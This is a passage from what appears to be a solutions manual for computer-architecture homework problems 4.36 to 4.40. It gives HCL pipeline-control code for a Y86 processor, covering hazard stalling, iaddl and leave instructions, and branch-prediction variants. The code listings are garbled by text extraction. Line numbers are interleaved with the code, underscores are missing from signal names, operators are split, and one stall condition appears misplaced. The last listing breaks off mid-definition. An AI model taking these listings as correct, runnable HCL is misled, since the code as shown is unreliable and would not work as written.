See the solution to Homework problem 4.34. When you test this code with the scripts in ptest, be sure to use the command line argument '-1.'

# **Problem 4.36 Solution:**

This is a hard problem, because there are many possible combinations of special cases that can occur simultaneously. Figure 1.1 illustrates this problem. We can see that there are now three variants of generate/use cases, where the instruction in the execute, memory, or write-back stage is generating a value to be used by the instruction in the decode stage. The second and third generate/use cases can occur in combination with a mispredicted branch. In this case, we want to handle the misprediction, injecting bubbles into the decode and execute stages.

For cases where a misprediction does not occur, each of the generate/use conditions can occur in combination with the first ret pattern (where ret uses the value of %esp). In this case, we want to handle the data hazard by stalling the fetch and and decode stages and injecting a bubble into the execute stage.

The test script ctest.pl in the ptest subdirectory generates tests that thoroughly test these possible control combinations.

The following shows the HCL code for the pipeline control logic.

\_\_\_\_\_\_ code/arch/pipe-nobypass-ans.hcl

```
2 # At most one of these can be true.
3 bool F bubble = 0;
4 bool F_stall =
           # Stall if either operand source is destination of
           # instruction in execute, memory, or write-back stages
          d_srcA != RNONE && d_srcA in
             { E_dstM, E_dstE, M_dstM, M_dstE, W_dstM, W_dstE } ||
           d_srcB != RNONE && d_srcB in
9
10
             { E_dstM, E_dstE, M_dstM, M_dstE, W_dstM, W_dstE } ||
           # Stalling at fetch while ret passes through pipeline
11
           IRET in { D_icode, E_icode, M_icode };
12
13
14 # Should I stall or inject a bubble into Pipeline Register D?
15 # At most one of these can be true.
16 bool D_stall =
           # Stall if either operand source is destination of
17
           # instruction in execute, memory, or write-back stages
18
           # but not part of mispredicted branch
19
           !(E_icode == IJXX && !e_Bch) &&
20
            (d_srcA != RNONE && d_srcA in
21
               { E_dstM, E_dstE, M_dstM, M_dstE, W_dstM, W_dstE } ||
22
             d_srcB != RNONE && d_srcB in
23
               { E_dstM, E_dstE, M_dstM, M_dstE, W_dstM, W_dstE });
24
25
26 bool D_bubble =
           # Mispredicted branch
27
           (E_icode == IJXX && !e_Bch) ||
28
           # Stalling at fetch while ret passes through pipeline
29
           !(E_icode in { IMRMOVL, IPOPL } && E_dstM in { d_srcA, d_srcB }) &&
30
31
           # but not condition for a generate/use hazard
32
           !(d_srcA != RNONE && d_srcA in
              { E_dstM, E_dstE, M_dstM, M_dstE, W_dstM, W_dstE } ||
33
             d srcB != RNONE && d srcB in
34
              { E dstM, E dstE, M dstM, M dstE, W dstM, W dstE }) &&
             IRET in { D_icode, E_icode, M_icode };
36
37
38 # Should I stall or inject a bubble into Pipeline Register E?
39 # At most one of these can be true.
40 bool E_stall = 0;
41 bool E_bubble =
42
           # Mispredicted branch
           (E_icode == IJXX && !e_Bch) ||
43
             # Inject bubble if either operand source is destination of
44
45
             # instruction in execute, memory, or write back stages
             d srcA != RNONE &&
46
                   d_srcA in { E_dstM, E_dstE, M_dstM, M_dstE, W_dstM, W_dstE } ||
47
48
             d srcB != RNONE &&
49
                   d_srcB in { E_dstM, E_dstE, M_dstM, M_dstE, W_dstM, W_dstE };
51 # Should I stall or inject a bubble into Pipeline Register M?
```

# **Problem 4.37 Solution:**

This problem is similar to Homework problem 4.34, but for the PIPE processor.

The following HCL code includes implementations of both the iaddl instruction and the leave instructions. You can test the solutions using the test code in the ptest subdirectory. Make sure you use command line argument '-i.'

\_\_\_\_\_ code/arch/pipe-full-ans.hcl

```
HCL Description of Control for Pipelined Y86 Processor
     Copyright (C) Randal E. Bryant, David R. O'Hallaron, 2002
4
6 ## This is the solution for the iaddl and leave problems
C Include's. Don't alter these
12 quote '#include <stdio.h>'
13 quote '#include "isa.h"'
14 quote '#include "pipeline.h"'
15 quote '#include "stages.h"'
16 quote '#include "sim.h"'
17 quote 'int sim_main(int argc, char *argv[]);'
18 quote 'int main(int argc, char *argv[]){return sim_main(argc,argv);}'
19
Declarations. Do not change/remove/delete any of these
24 ##### Symbolic representation of Y86 Instruction Codes ##############
25 intsig INOP
            'I NOP'
26 intsig IHALT
            'I HALT'
27 intsig IRRMOVL 'I_RRMOVL'
28 intsig IIRMOVL 'I_IRMOVL'
29 intsig IRMMOVL 'I_RMMOVL'
30 intsig IMRMOVL 'I_MRMOVL'
31 intsig IOPL
            'I_ALU'
32 intsig IJXX
            'I_JMP'
33 intsig ICALL
            'I_CALL'
            'I_RET'
34 intsig IRET
35 intsig IPUSHL
            'I PUSHL'
```

```
36 intsig IPOPL 'I_POPL'
37 # Instruction code for iaddl instruction
38 intsig IIADDL 'I_IADDL'
39 # Instruction code for leave instruction
40 intsig ILEAVE 'I_LEAVE'
41
42 ##### Symbolic representation of Y86 Registers referenced explicitly #####
43 intsig RESP 'REG_ESP' # Stack Pointer
               'REG_EBP'
44 intsig REBP
                            # Frame Pointer
45 intsig RNONE 'REG_NONE'
                            # Special value indicating "no register"
48 intsig ALUADD 'A_ADD' # ALU should add its arguments
50 ##### Signals that can be referenced by control logic ################
54 intsig F_predPC 'pc_curr->pc'
                                     # Predicted value of PC
57
58 intsig f_icode 'if_id_next->icode' # Fetched instruction code
59 intsig f_ifun 'if_id_next->ifun' # Fetched instruction function
60 intsig f_valC 'if_id_next->valc' # Constant data of fetched instruction
61 intsig f_valP 'if_id_next->valp' # Address of following instruction
62
64 intsig D_icode 'if_id_curr->icode'  # Instruction code
65 intsig D_rA 'if_id_curr->ra'  # rA field from instruction
66 intsig D_rB 'if_id_curr->rb'  # rB field from instruction
67 intsig D_valP 'if_id_curr->valp' # Incremented PC
71 intsig d_srcA 'id_ex_next->srca'  # srcA from decoded instruction
72 intsig d_srcB 'id_ex_next->srcb'  # srcB from decoded instruction
73 intsig d_rvalA 'd_regvala'  # valA read from register file
74 intsig d_rvalB 'd_regvalb'
                                    # valB read from register file
82 intsig E_srcB 'id_ex_curr->srcb'  # Source B register ID
83 intsig E_valB 'id_ex_curr->valb'  # Source B value
84 intsig E_dstE 'id_ex_curr->deste'  # Destination E register ID
85 intsig E_dstM 'id_ex_curr->destm'  # Destination M register ID
```

```
86
87 ##### Intermediate Values in Execute Stage ###################################
88 intsig e_valE 'ex_mem_next->vale' # valE generated by ALU
89 boolsig e_Bch 'ex_mem_next->takebranch' # Am I about to branch?
91 ##### Pipeline Register M
                                       #####
92 intsig M_icode 'ex_mem_curr->icode'
                                    # Instruction code
93 intsig M_ifun 'ex_mem_curr->ifun'
                                   # Instruction function
94 intsig M_valA 'ex_mem_curr->vala'
                                    # Source A value
95 intsig M_dstE 'ex_mem_curr->deste'
                                   # Destination E register ID
96 intsig M_valE 'ex_mem_curr->vale'
                                   # ALU E value
                                 # Destination M register ID
97 intsig M dstM 'ex mem curr->destm'
98 boolsig M_Bch 'ex_mem_curr->takebranch' # Branch Taken flag
101 intsig m_valM 'mem_wb_next->valm'
                                   # valM generated by memory
104 intsig W_icode 'mem_wb_curr->icode'
                                    # Instruction code
105 intsig W_dstE 'mem_wb_curr->deste'
                                    # Destination E register ID
106 intsig W_valE
               'mem_wb_curr->vale'
                                    # ALU E value
107 intsig W_dstM 'mem_wb_curr->destm'
                                   # Destination M register ID
108 intsig W_valM 'mem_wb_curr->valm'
                                   # Memory M value
109
Control Signal Definitions.
114 ############# Fetch Stage
                             116 ## What address should instruction be fetched at
117 int f_pc = [
         # Mispredicted branch. Fetch at incremented PC
118
         M icode == IJXX && !M Bch : M valA;
         # Completion of RET instruction.
120
         W_icode == IRET : W_valM;
         # Default: Use predicted value of PC
122
         1 : F_predPC;
123
124 ];
126 # Does fetched instruction require a regid byte?
127 bool need_regids =
         f_icode in { IRRMOVL, IOPL, IPUSHL, IPOPL,
128
                    IIRMOVL, IRMMOVL, IMRMOVL, IIADDL };
129
130
131 # Does fetched instruction require a constant word?
132 bool need valC =
133
         f_icode in { IIRMOVL, IRMMOVL, IMRMOVL, IJXX, ICALL, IIADDL };
135 bool instr_valid = f_icode in
```

```
{ INOP, IHALT, IRRMOVL, IIRMOVL, IRMMOVL, IMRMOVL,
136
                  IOPL, IJXX, ICALL, IRET, IPUSHL, IPOPL, IIADDL, ILEAVE };
137
138
139 # Predict next value of PC
140 int new_F_predPC = [
           f_icode in { IJXX, ICALL } : f_valC;
           1 : f_valP;
142
143 ];
144
145
148
149 ## What register should be used as the A source?
150 int new_E_srcA = [
           Dicode in { IRRMOVL, IRMMOVL, IOPL, IPUSHL } : DrA;
151
           D_icode in { IPOPL, IRET } : RESP;
152
           D_icode in { ILEAVE } : REBP;
153
           1 : RNONE; # Don't need register
155 ];
157 ## What register should be used as the B source?
158 int new_E_srcB = [
           D_icode in { IOPL, IRMMOVL, IMRMOVL, IIADDL } : D_rB;
           D_icode in { IPUSHL, IPOPL, ICALL, IRET } : RESP;
160
           D_icode in { ILEAVE } : REBP;
161
           1 : RNONE; # Don't need register
162
163 ];
164
165 ## What register should be used as the E destination?
166 int new_E_dstE = [
           D_icode in { IRRMOVL, IIRMOVL, IOPL, IIADDL } : D_rB;
167
           D_icode in { IPUSHL, IPOPL, ICALL, IRET, ILEAVE } : RESP;
168
           1 : RNONE; # Don't need register
170 ];
171
172 ## What register should be used as the M destination?
173 int new_E_dstM = [
174 D_icode in { IMRMOVL, IPOPL } : D_rA;
         D_icode in { ILEAVE } : REBP;
175
176
           1 : RNONE; # Don't need register
177 ];
178
179 ## What should be the A value?
180 ## Forward into decode stage for valA
181 int new E valA = [
182
           D_icode in { ICALL, IJXX } : D_valP; # Use incremented PC
           d_srcA == E_dstE : e_valE; # Forward valE from execute
183
          d_srcA == M_dstM : m_valM;  # Forward valM from memory
184
          d_srcA == M_dstE : M_valE; # Forward valE from memory
185
```

```
d_srcA == W_dstM : W_valM;
                                        # Forward valM from write back
           d srcA == W dstE : W valE;
                                        # Forward valE from write back
           1 : d_rvalA; # Use value read from register file
188
189 ];
190
191 int new_E_valB = [
          d_srcB == E_dstE : e_valE;
                                     # Forward valE from execute
192
           d_srcB == M_dstM : m_valM;
193
                                     # Forward valM from memory
                                     # Forward valE from memory
# Forward valM from write back
# Forward valE from write back
          d_srcB == M_dstE : M_valE;
194
          d_srcB == W_dstM : W_valM;
195
          d srcB == W dstE : W valE;
196
           1 : d rvalB; # Use value read from register file
197
198];
199
202 ## Select input A to ALU
203 int aluA = [
          E_icode in { IRRMOVL, IOPL } : E_valA;
           E_icode in { IIRMOVL, IRMMOVL, IMRMOVL, IIADDL } : E_valC;
205
           E_icode in { ICALL, IPUSHL } : -4;
          E_icode in { IRET, IPOPL, ILEAVE } : 4;
207
           # Other instructions don't need ALU
208
209 ];
210
211 ## Select input B to ALU
212 int aluB = [
           E icode in { IRMMOVL, IMRMOVL, IOPL, ICALL,
213
                        IPUSHL, IRET, IPOPL, IIADDL, ILEAVE } : E_valB;
214
215
           E_icode in { IRRMOVL, IIRMOVL } : 0;
216
           # Other instructions don't need ALU
217 ];
218
219 ## Set the ALU function
220 int alufun = [
          E_icode == IOPL : E_ifun;
          1 : ALUADD;
222
223 ];
225 ## Should the condition codes be updated?
226 bool set_cc = E_icode in { IOPL, IIADDL };
227
228
231 ## Select memory address
232 int mem addr = [
233 M_icode in { IRMMOVL, IPUSHL, ICALL, IMRMOVL } : M_valE;
         M_icode in { IPOPL, IRET, ILEAVE } : M_valA;
           # Other instructions don't need address
235
```

```
236 ];
238 ## Set read control signal
239 bool mem_read = M_icode in { IMRMOVL, IPOPL, IRET, ILEAVE };
241 ## Set write control signal
242 bool mem_write = M_icode in { IRMMOVL, IPUSHL, ICALL };
243
247 # Should I stall or inject a bubble into Pipeline Register F?
248 # At most one of these can be true.
249 bool F_bubble = 0;
250 bool F_stall =
           # Conditions for a load/use hazard
251
           E_icode in { IMRMOVL, IPOPL, ILEAVE } &&
252
            E_dstM in { d_srcA, d_srcB } | |
253
           # Stalling at fetch while ret passes through pipeline
           IRET in { D_icode, E_icode, M_icode };
255
257 # Should I stall or inject a bubble into Pipeline Register D?
258 # At most one of these can be true.
259 bool D_stall =
           # Conditions for a load/use hazard
260
           E_icode in { IMRMOVL, IPOPL, ILEAVE } &&
261
            E_dstM in { d_srcA, d_srcB };
262
263
264 bool D bubble =
265
           # Mispredicted branch
266
           (E_icode == IJXX && !e_Bch) ||
           # Stalling at fetch while ret passes through pipeline
267
           # but not condition for a load/use hazard
268
           !(E icode in { IMRMOVL, IPOPL, ILEAVE } && E dstM in { d srcA, d srcB }) &&
             IRET in { D_icode, E_icode, M_icode };
270
271
272 # Should I stall or inject a bubble into Pipeline Register E?
273 # At most one of these can be true.
274 bool E_stall = 0;
275 bool E_bubble =
276
           # Mispredicted branch
277
           (E_icode == IJXX && !e_Bch) ||
           # Conditions for a load/use hazard
278
           E_icode in { IMRMOVL, IPOPL, ILEAVE } &&
279
              E_dstM in { d_srcA, d_srcB};
280
282 # Should I stall or inject a bubble into Pipeline Register M?
283 # At most one of these can be true.
284 bool M stall = 0;
285 bool M bubble = 0;
```

\_\_\_\_\_ code/arch/pipe-full-ans.hcl

#### **Problem 4.38 Solution:**

See the solution to Homework problem 4.37. When you test this code with the scripts in ptest, be sure to use the command line argument '-1.'

# **Problem 4.39 Solution:**

This problem requires changing the logic for predicting the PC value and the misprediction condition. It requires distinguishing between conditional and unconditational branches. The complete HCL code is shown below. You should be able to detect whether the prediction logic is following the correct policy by doing performance checks as part of the testing with the scripts in the ptest directory. See the README file for documentation.

\_\_\_\_\_ code/arch/pipe-nt-ans.hcl

```
2 #
     HCL Description of Control for Pipelined Y86 Processor
     Copyright (C) Randal E. Bryant, David R. O'Hallaron, 2002
6 ## This is the solution for the branches not-taken problem
C Include's. Don't alter these
11
12 quote '#include <stdio.h>'
13 quote '#include "isa.h"'
14 quote '#include "pipeline.h"'
15 quote '#include "stages.h"'
16 quote '#include "sim.h"'
17 quote 'int sim_main(int argc, char *argv[]);'
18 quote 'int main(int argc, char *argv[]){return sim_main(argc,argv);}'
19
Declarations. Do not change/remove/delete any of these
24 ##### Symbolic representation of Y86 Instruction Codes ##############
25 intsig INOP 'I NOP'
26 intsig IHALT
            'I_HALT'
27 intsig IRRMOVL 'I_RRMOVL'
28 intsig IIRMOVL 'I_IRMOVL'
29 intsig IRMMOVL 'I_RMMOVL'
30 intsig IMRMOVL 'I_MRMOVL'
31 intsig IOPL
            'I ALU'
32 intsig IJXX
            'I_JMP'
33 intsig ICALL
            'I_CALL'
34 intsiq IRET
            'I RET'
```

```
35 intsig IPUSHL 'I_PUSHL'
36 intsig IPOPL 'I POPL'
38 ##### Symbolic representation of Y86 Registers referenced explicitly #####
39 intsig RESP
             'REG_ESP'
                          # Stack Pointer
40 intsig RNONE
               'REG_NONE'
                           # Special value indicating "no register"
43 intsig ALUADD 'A_ADD'
                           # ALU should add its arguments
44 ## BNT: For modified branch prediction, need to distinguish
45 ## conditional vs. unconditional branches
46 ##### Jump conditions referenced explicitly
47 intsig JUNCOND 'J_YES' # Code for unconditional jump instruction
49 ##### Signals that can be referenced by control logic ###############
53 intsig F_predPC 'pc_curr->pc'
                                  # Predicted value of PC
54
57 intsig f_icode 'if_id_next->icode' # Fetched instruction code
58 intsig f_ifun
              'if_id_next->ifun'
                               # Fetched instruction function
                              # Constant data of fetched instruction
59 intsig f_valC
              'if_id_next->valc'
60 intsig f_valP 'if_id_next->valp' # Address of following instruction
61
63 intsig D_icode 'if_id_curr->icode'  # Instruction code
64 intsig D_rA 'if_id_curr->ra'  # rA field from instruction
65 intsig D_rB 'if_id_curr->rb'  # rB field from instruction
66 intsig D_valP 'if_id_curr->valp'
                              # Incremented PC
'id_ex_next->srca'
'id_ex_next->srcb'
70 intsig d_srcA
                                  # srcA from decoded instruction
71 intsig d_srcB
                                 # srcB from decoded instruction
72 intsig d_rvalA 'd_regvala'
                                  # valA read from register file
73 intsig d_rvalB 'd_regvalb'
                                  # valB read from register file
76 intsig E_icode 'id_ex_curr->icode'
                                  # Instruction code
77 intsig E_ifun 'id_ex_curr->ifun'
                                  # Instruction function
78 intsig E_valC 'id_ex_curr->valc'
                                 # Constant data
79 intsig E srcA 'id ex curr->srca'
                                 # Source A register ID
80 intsig E_valA 'id_ex_curr->vala'
                                 # Source A value
81 intsig E_srcB 'id_ex_curr->srcb'
                                 # Source B register ID
82 intsig E_valB 'id_ex_curr->valb'
                                 # Source B value
                                # Destination E register ID
83 intsig E_dstE 'id_ex_curr->deste'
84 intsig E_dstM 'id_ex_curr->destm'  # Destination M register ID
```

```
25
86 ##### Intermediate Values in Execute Stage ###################################
87 intsig e_valE 'ex_mem_next->vale' # valE generated by ALU
88 boolsig e_Bch 'ex_mem_next->takebranch' # Am I about to branch?
90 ##### Pipeline Register M
                                       #####
91 intsig M_icode 'ex_mem_curr->icode'
                                    # Instruction code
92 intsig M_ifun 'ex_mem_curr->ifun'
                                   # Instruction function
93 intsig M_valA 'ex_mem_curr->vala'
                                    # Source A value
94 intsig M_dstE 'ex_mem_curr->deste'
                                   # Destination E register ID
95 intsig M valE 'ex mem curr->vale'
                                   # ALU E value
                                 # Destination M register ID
96 intsig M dstM 'ex mem curr->destm'
97 boolsig M_Bch 'ex_mem_curr->takebranch' # Branch Taken flag
100 intsig m valM 'mem wb next->valm'
                                   # valM generated by memory
103 intsig W_icode 'mem_wb_curr->icode'
                                   # Instruction code
104 intsig W_dstE 'mem_wb_curr->deste'
                                    # Destination E register ID
105 intsig W_valE
               'mem_wb_curr->vale'
                                    # ALU E value
106 intsig W_dstM 'mem_wb_curr->destm'
                                   # Destination M register ID
107 intsig W_valM 'mem_wb_curr->valm'
                                   # Memory M value
108
Control Signal Definitions.
113 ############ Fetch Stage
                             115 ## What address should instruction be fetched at
116 int f_pc = [
         # Mispredicted branch. Fetch at incremented PC
117
         # BNT: Changed misprediction condition
         M_icode == IJXX && M_ifun != JUNCOND && M_Bch : M_valE;
119
         # Completion of RET instruction.
         W_icode == IRET : W_valM;
121
         # Default: Use predicted value of PC
         1 : F_predPC;
123
124 ];
125
126 # Does fetched instruction require a regid byte?
127 bool need_regids =
         f_icode in { IRRMOVL, IOPL, IPUSHL, IPOPL,
128
                    IIRMOVL, IRMMOVL, IMRMOVL };
129
131 # Does fetched instruction require a constant word?
132 bool need valC =
         f_icode in { IIRMOVL, IRMMOVL, IMRMOVL, IJXX, ICALL };
133
134
```

```
135 bool instr_valid = f_icode in
           { INOP, IHALT, IRRMOVL, IIRMOVL, IRMMOVL, IMRMOVL,
                 IOPL, IJXX, ICALL, IRET, IPUSHL, IPOPL };
137
138
139 # Predict next value of PC
140 int new_F_predPC = [
           # BNT: Revised branch prediction rule:
141
           # Unconditional branch is taken, others not taken
142
           f_icode == IJXX && f_ifun == JUNCOND : f_valC;
143
           f_icode in { ICALL } : f_valC;
144
           1 : f valP;
145
146 ];
147
148
150
152 ## What register should be used as the A source?
153 int new_E_srcA = [
          D_icode in { IRRMOVL, IRMMOVL, IOPL, IPUSHL } : D_rA;
154
          D_icode in { IPOPL, IRET } : RESP;
          1 : RNONE; # Don't need register
156
157 ];
158
159 ## What register should be used as the B source?
160 int new_E_srcB = [
          D_icode in { IOPL, IRMMOVL, IMRMOVL } : D_rB;
          D_icode in { IPUSHL, IPOPL, ICALL, IRET } : RESP;
162
           1 : RNONE; # Don't need register
164 ];
165
166 ## What register should be used as the E destination?
167 int new_E_dstE = [
         D icode in { IRRMOVL, IIRMOVL, IOPL} : D rB;
          D_icode in { IPUSHL, IPOPL, ICALL, IRET } : RESP;
169
           1 : RNONE; # Don't need register
171 ];
172
173 ## What register should be used as the M destination?
174 int new_E_dstM = [
175 D_icode in { IMRMOVL, IPOPL } : D_rA;
          1 : RNONE; # Don't need register
176
177 ];
179 ## What should be the A value?
180 ## Forward into decode stage for valA
181 int new_E_valA = [
          D_icode in { ICALL, IJXX } : D_valP; # Use incremented PC
182
183
          d_srcA == E_dstE : e_valE; # Forward valE from execute
         d_srcA == M_dstM : m_valM;  # Forward valM from memory
184
```

```
d_srcA == M_dstE : M_valE;
                                         # Forward valE from memory
           d srcA == W dstM : W valM;
                                         # Forward valM from write back
186
           d_srcA == W_dstE : W_valE;
                                         # Forward valE from write back
187
188
           1 : d_rvalA; # Use value read from register file
189 ];
190
191 int new_E_valB = [
         d_srcB == E_dstE : e_valE;
                                      # Forward valE from execute
                                      # Forward valM from memory
# Forward valE from memory
193
           d_srcB == M_dstM : m_valM;
           d_srcB == M_dstE : M_valE;
194
           d_srcB == W_dstM : W_valM;
                                      # Forward valM from write back
195
           d srcB == W dstE : W valE;
                                      # Forward valE from write back
196
           1 : d_rvalB; # Use value read from register file
197
198 l;
199
202 # BNT: When some branches are predicted as not-taken, you need some
203 # way to get valC into pipeline register M, so that
204 # you can correct for a mispredicted branch.
205 # One way to do this is to run valC through the ALU, adding 0
206 # so that valC will end up in M_valE
208 ## Select input A to ALU
209 int aluA = [
           E_icode in { IRRMOVL, IOPL } : E_valA;
210
           # BNT: Use ALU to pass E_valC to M_valE
211
           E icode in { IIRMOVL, IRMMOVL, IMRMOVL, IJXX } : E valC;
212
           E_icode in { ICALL, IPUSHL } : -4;
213
214
           E_icode in { IRET, IPOPL } : 4;
215
           # Other instructions don't need ALU
216 ];
217
218 ## Select input B to ALU
219 int aluB = [
           E_icode in { IRMMOVL, IMRMOVL, IOPL, ICALL,
                         IPUSHL, IRET, IPOPL } : E_valB;
221
           # BNT: Add 0 to valC
           E_icode in { IRRMOVL, IJXX } : 0;
223
           # Other instructions don't need ALU
224
225 ];
226
227 ## Set the ALU function
228 int alufun = [
229
          E icode == IOPL : E ifun;
           1 : ALUADD;
230
231 ];
232
233 ## Should the condition codes be updated?
234 bool set cc = E icode == IOPL;
```

```
235
239 ## Select memory address
240 int mem_addr = [
241 M_icode in { IRMMOVL, IPUSHL, ICALL, IMRMOVL } : M_valE;
          M_icode in { IPOPL, IRET } : M_valA;
243
          # Other instructions don't need address
244 ];
245
246 ## Set read control signal
247 bool mem_read = M_icode in { IMRMOVL, IPOPL, IRET };
249 ## Set write control signal
250 bool mem_write = M_icode in { IRMMOVL, IPUSHL, ICALL };
252
254
255 # Should I stall or inject a bubble into Pipeline Register F?
256 # At most one of these can be true.
257 bool F bubble = 0;
258 bool F_stall =
          # Conditions for a load/use hazard
259
          E_icode in { IMRMOVL, IPOPL } &&
260
           E_dstM in { d_srcA, d_srcB } | |
261
           # Stalling at fetch while ret passes through pipeline
262
          IRET in { D_icode, E_icode, M_icode };
263
265 # Should I stall or inject a bubble into Pipeline Register D?
266 # At most one of these can be true.
267 bool D stall =
          # Conditions for a load/use hazard
          E_icode in { IMRMOVL, IPOPL } &&
269
270
           E_dstM in { d_srcA, d_srcB };
271
272 bool D_bubble =
          # Mispredicted branch
273
          # BNT: Changed misprediction condition
274
275
          (E_icode == IJXX && E_ifun != JUNCOND && e_Bch) |
          # Stalling at fetch while ret passes through pipeline
276
          # but not condition for a load/use hazard
277
          !(E_icode in { IMRMOVL, IPOPL } && E_dstM in { d_srcA, d_srcB }) &&
278
            IRET in { D_icode, E_icode, M_icode };
279
281 # Should I stall or inject a bubble into Pipeline Register E?
282 # At most one of these can be true.
283 bool E stall = 0;
284 bool E_bubble =
```

```
# Mispredicted branch
285
            # BNT: Changed misprediction condition
286
            (E_icode == IJXX && E_ifun != JUNCOND && e_Bch) ||
287
288
           # Conditions for a load/use hazard
           E_icode in { IMRMOVL, IPOPL } &&
289
               E_dstM in { d_srcA, d_srcB};
290
291
292 # Should I stall or inject a bubble into Pipeline Register M?
293 # At most one of these can be true.
294 bool M stall = 0;
295 bool M bubble = 0;
```

\_\_\_\_\_ code/arch/pipe-nt-ans.hcl

### **Problem 4.40 Solution:**

This problem requires changing the logic for predicting the PC value and the misprediction condition. It's just a little bit more complex than Homework Problem 4.39. The complete HCL code is shown below. You should be able to detect whether the prediction logic is following the correct policy by doing performance checks as part of the testing with the scripts in the ptest directory. See the README file for documentation.

\_\_\_\_\_ code/arch/pipe-btfnt-ans.hcl

```
HCL Description of Control for Pipelined Y86 Processor
    Copyright (C) Randal E. Bryant, David R. O'Hallaron, 2002
6 ## BBTFNT: This is the solution for the backward taken, forward
7 ## not-taken branch prediction problem
8
C Include's. Don't alter these
12
13 quote '#include <stdio.h>'
14 quote '#include "isa.h"'
15 quote '#include "pipeline.h"'
16 quote '#include "stages.h"'
17 quote '#include "sim.h"'
18 quote 'int sim_main(int argc, char *argv[]);'
19 quote 'int main(int argc, char *argv[]){return sim_main(argc,argv);}'
20
Declarations. Do not change/remove/delete any of these
25 ##### Symbolic representation of Y86 Instruction Codes ##############
26 intsig INOP
           'I NOP'
27 intsig IHALT
           'I HALT'
```

```
28 intsig IRRMOVL 'I_RRMOVL'
29 intsig IIRMOVL 'I IRMOVL'
30 intsig IRMMOVL 'I_RMMOVL'
31 intsig IMRMOVL 'I_MRMOVL'
            'I_ALU'
32 intsig IOPL
           'I_JMP'
33 intsig IJXX
34 intsig ICALL
             'I_CALL'
35 intsig IRET 'I_RET'
36 intsig IPUSHL 'I_PUSHL'
37 intsig IPOPL
             'I POPL'
39 ##### Symbolic representation of Y86 Registers referenced explicitly #####
40 intsig RESP 'REG_ESP' # Stack Pointer
41 intsig RNONE 'REG_NONE'
                        # Special value indicating "no register"
42
44 intsig ALUADD 'A ADD' # ALU should add its arguments
45 ## BBTFNT: For modified branch prediction, need to distinguish
46 ## conditional vs. unconditional branches
47 ##### Jump conditions referenced explicitly
48 intsig JUNCOND 'J_YES'
                   # Code for unconditional jump instruction
49
50 ##### Signals that can be referenced by control logic ###############
54 intsig F_predPC 'pc_curr->pc'  # Predicted value of PC
57
58 intsig f_icode 'if_id_next->icode' # Fetched instruction code
59 intsig f_ifun 'if_id_next->ifun' # Fetched instruction function
60 intsig f_valC 'if_id_next->valc' # Constant data of fetched instruction
61 intsig f valP 'if id next->valp' # Address of following instruction
64 intsig D_icode 'if_id_curr->icode'  # Instruction code
65 intsig D_rA 'if_id_curr->ra'  # rA field from instruction
66 intsig D_rB 'if_id_curr->rb'  # rB field from instruction
67 intsig D_valP 'if_id_curr->valp'
                              # Incremented PC
70
                             # srcA from decoded instruction
71 intsig d srcA
             'id_ex_next->srca'
            'id_ex_next->srcb'
72 intsig d srcB
                             # srcB from decoded instruction
74 intsig d_rvalB 'd_regvalb'
                              # valB read from register file
75
```

```
78 intsig E_ifun 'id_ex_curr->ifun'
                                   # Instruction function
79 intsig E valC 'id ex curr->valc'
                                    # Constant data
80 intsig E_srcA 'id_ex_curr->srca'
                                   # Source A register ID
81 intsig E_valA 'id_ex_curr->vala'
                                  # Source A value
82 intsig E_srcB 'id_ex_curr->srcb'
                                  # Source B register ID
                                  # Source B value
83 intsig E_valB 'id_ex_curr->valb'
84 intsig E_dstE 'id_ex_curr->deste'
                                  # Destination E register ID
85 intsig E_dstM 'id_ex_curr->destm'
                                  # Destination M register ID
88 intsig e valE 'ex mem next->vale' # valE generated by ALU
89 boolsig e Bch 'ex mem next->takebranch' # Am I about to branch?
90
91 ##### Pipeline Register M
                                      #####
92 intsig M_icode 'ex_mem_curr->icode'
                                  # Instruction code
93 intsig M ifun 'ex mem curr->ifun'
                                  # Instruction function
94 intsig M valA 'ex mem curr->vala'
                                   # Source A value
95 intsig M_dstE 'ex_mem_curr->deste'
                                  # Destination E register ID
96 intsig M_valE 'ex_mem_curr->vale'
                                  # ALU E value
97 intsig M_dstM 'ex_mem_curr->destm'  # Destination M register ID
98 boolsig M_Bch 'ex_mem_curr->takebranch' # Branch Taken flag
99
101 intsig m_valM 'mem_wb_next->valm'
                                   # valM generated by memory
102
104 intsig W_icode 'mem_wb_curr->icode'  # Instruction code
                                  # Destination E register ID
105 intsig W dstE 'mem wb curr->deste'
                                  # ALU E value
106 intsig W valE 'mem wb curr->vale'
107 intsig W_dstM 'mem_wb_curr->destm'
                                  # Destination M register ID
108 intsig W_valM 'mem_wb_curr->valm'
                                  # Memory M value
109
111 # Control Signal Definitions.
114 ############ Fetch Stage
                            116 ## What address should instruction be fetched at
117 int f_pc = [
118
         # Mispredicted branch. Fetch at incremented PC
         # BBTFNT: Mispredicted forward branch. Fetch at target (now in valE)
119
         M_icode == IJXX && M_ifun != JUNCOND && M_valE >= M_valA
120
           && M_Bch : M_valE;
121
         # BBTFNT: Mispredicted backward branch.
122
         # Fetch at incremented PC (now in valE)
123
124
         M_icode == IJXX && M_ifun != JUNCOND && M_valE < M_valA
125
          && !M_Bch : M_valA;
         # Completion of RET instruction.
126
         W_icode == IRET : W_valM;
127
```

```
# Default: Use predicted value of PC
128
           1 : F predPC;
130 ];
131
132 # Does fetched instruction require a regid byte?
133 bool need_regids =
           f_icode in { IRRMOVL, IOPL, IPUSHL, IPOPL,
134
                        IIRMOVL, IRMMOVL, IMRMOVL };
135
136
137 # Does fetched instruction require a constant word?
138 bool need valC =
           f icode in { IIRMOVL, IRMMOVL, IMRMOVL, IJXX, ICALL };
140
141 bool instr_valid = f_icode in
           { INOP, IHALT, IRRMOVL, IIRMOVL, IRMMOVL, IMRMOVL,
                  IOPL, IJXX, ICALL, IRET, IPUSHL, IPOPL };
143
144
145 # Predict next value of PC
146 int new_F_predPC = [
           f_icode in { ICALL } : f_valC;
147
           f_icode == IJXX && f_ifun == JUNCOND : f_valC; # Unconditional branch
148
          f_icode == IJXX && f_valC < f_valP : f_valC; # Backward branch</pre>
149
           # BBTFNT: Forward conditional branches will default to valP
150
           1 : f_valP;
151
152 ];
153
156
157
158 ## What register should be used as the A source?
159 int new_E_srcA = [
           D_icode in { IRRMOVL, IRMMOVL, IOPL, IPUSHL } : D_rA;
           D icode in { IPOPL, IRET } : RESP;
           1 : RNONE; # Don't need register
162
163 ];
165 ## What register should be used as the B source?
166 int new_E_srcB = [
           D_icode in { IOPL, IRMMOVL, IMRMOVL } : D_rB;
167
           D_icode in { IPUSHL, IPOPL, ICALL, IRET } : RESP;
168
           1 : RNONE; # Don't need register
169
170 ];
172 ## What register should be used as the E destination?
173 int new E dstE = [
